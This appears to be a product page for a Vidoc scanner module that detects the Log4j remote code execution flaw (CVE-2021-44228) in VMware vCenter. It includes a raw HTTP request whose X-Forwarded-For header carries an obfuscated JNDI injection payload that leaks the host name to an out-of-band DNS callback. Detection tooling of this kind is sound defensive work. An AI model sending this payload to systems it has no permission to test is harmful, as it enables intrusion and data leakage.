Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

VMware VCenter - Remote Code Execution (Apache Log4j)

By kannthu

Critical
Vidoc logoVidoc Module
#cve#cve2021#rce#jndi#log4j
Description

What is the "VMware VCenter - Remote Code Execution (Apache Log4j)" module?

The "VMware VCenter - Remote Code Execution (Apache Log4j)" module is designed to detect the vulnerability in VMware VCenter that allows remote code execution through the Apache Log4j framework. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute malware and obtain sensitive information.

Impact

If successfully exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary code on the affected system, leading to potential data breaches, unauthorized access, and system compromise. It is crucial to address this vulnerability promptly to prevent any potential damage.

How does the module work?

The module works by sending HTTP requests to the target VMware VCenter system and applying specific matching conditions to identify the presence of the vulnerability. One example of an HTTP request used by the module is:

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <Hostname>
X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}

The module uses two matching conditions to determine if the vulnerability is present:

- The first condition checks for the presence of the "dns" protocol in the interaction. - The second condition uses a regular expression to match a specific pattern in the interaction request.

If both conditions are met, the module reports the vulnerability, indicating the need for immediate action to mitigate the risk.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
regex: ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-...
Passive global matcher
No matching conditions.
On match action
Report vulnerability